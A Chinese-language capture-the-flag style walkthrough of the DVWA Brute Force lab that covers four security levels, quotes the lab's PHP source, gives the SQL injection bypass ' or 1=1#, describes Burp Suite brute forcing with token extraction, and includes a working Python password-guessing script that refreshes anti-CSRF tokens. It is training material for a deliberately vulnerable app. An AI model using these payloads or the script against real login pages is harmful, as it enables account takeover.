DVWA - Brute Force
等级:low
直接上bp弱口令爆破,设置变量,攻击类型最后一个,payload为用户名、密码简单列表
直接run,长度排序下,不一样的就是正确的用户名和密码
另解:
看一下源码,user变量直接被嵌入sql语句中,没有进行任何过滤,故可以用万能密码(' or 1=1#)截断sql语句,使result值为1,绕过登陆验证
等级:medium
直接看源码:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$avatar = mysql_result( $result, 0, "avatar" );
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( 2 );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
添加了mysql_real_escape_string( )函数来转义参数中的特殊字符,故万能密码行不通,此外增加了登陆失败执行sleep(2)函数,一定程度上限制了爆破攻击,增加攻击者的成本。我们依旧用bp爆破,但是要设置下请求间隔为2100毫秒
等级:high
直接看源码:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Sanitise username input
$user = $_GET[ 'username' ];
$user = stripslashes( $user );
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
// Check database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$avatar = mysql_result( $result, 0, "avatar" );
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( rand( 0, 3 ) );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
mysql_close();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
这里添加了token的校验,checkToken( )函数检查用户token和会话token是否相同,generateSessionToken( )函数是自定义函数,用于创建user_token,这里是从上一次请求的response里面提取的token,我们抓个包分析下
所以我们用bp爆破的话,要给token设置变量,递归提取token,操作如下:
先设置grep规则,要勾选总是重定向,线程要设置成1,url编码要把=和&去掉
然后run
另解:
当然不熟悉bp操作的话,可以写python脚本来解决,如下:
import re
import requests
# 设置cookie
headers = {
'Cookie': 'PHPSESSID=m7t4i0m8ft1rh1p6frtm5t0bh0; security=high',
}
# 从返回值中提取cookie
def get_token():
url = 'http://ctfdemo.com:8008/vulnerabilities/brute/'
req = requests.get(url, headers=headers)
match = re.search(r'value=\'(.+)\'', req.text)
return match.group(1)
# 请求脚本,这里为了省事,用户名固定了
def brute(pw, user_token):
url = "http://ctfdemo.com:8008/vulnerabilities/brute/"
params = {
'username': 'admin',
'password': pw,
'Login': 'Login',
'user_token':user_token
}
req = requests.get(url, params=params, headers=headers)
return req.text
def main():
with open('password.txt') as p:
pslist = p.readlines()
p.close()
for line in pslist:
line = line.strip()
user_token = get_token()
result = brute(line, user_token)
print("%s...... 已测试" % line)
if not "incorrect" in result:
print("攻击成功,密码是: %s" % line)
break
if __name__ == '__main__':
main()
输出:
等级:impossible
直接分析源码:
<?php
if( isset( $_POST[ 'Login' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Sanitise username input
$user = $_POST[ 'username' ];
$user = stripslashes( $user );
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_POST[ 'password' ];
$pass = stripslashes( $pass );
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
// Default values
$total_failed_login = 3;
$lockout_time = 15;
$account_locked = false;
// Check the database (Check user information)
$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// Check to see if the user has been locked out.
if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {
// User locked out. Note, using this method would allow for user enumeration!
//echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";
// Calculate when the user would be allowed to login again
$last_login = $row[ 'last_login' ];
$last_login = strtotime( $last_login );
$timeout = strtotime( "{$last_login} +{$lockout_time} minutes" );
$timenow = strtotime( "now" );
// Check to see if enough time has passed, if it hasn't locked the account
if( $timenow > $timeout )
$account_locked = true;
}
// Check the database (if username matches the password)
$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR);
$data->bindParam( ':password', $pass, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// If its a valid login...
if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
// Get users details
$avatar = $row[ 'avatar' ];
$failed_login = $row[ 'failed_login' ];
$last_login = $row[ 'last_login' ];
// Login successful
echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
echo "<img src=\"{$avatar}\" />";
// Had the account been locked out since last login?
if( $failed_login >= $total_failed_login ) {
echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
}
// Reset bad login count
$data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
else {
// Login failed
sleep( rand( 2, 4 ) );
// Give the user some feedback
echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";
// Update bad login count
$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// Set the last login time
$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
使用了 PDO(PHP Data Objects)扩展,即预处理和参数化查询,避免了SQL注入攻击;设置了最大登陆次数($total_failed_login = 3),当登陆失败的次数超过3次,会输出警告信息,锁定账户。在一方面确实防止了爆破攻击,但是我们可以批量让用户锁定,也是在一方面影响了用户的体验。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
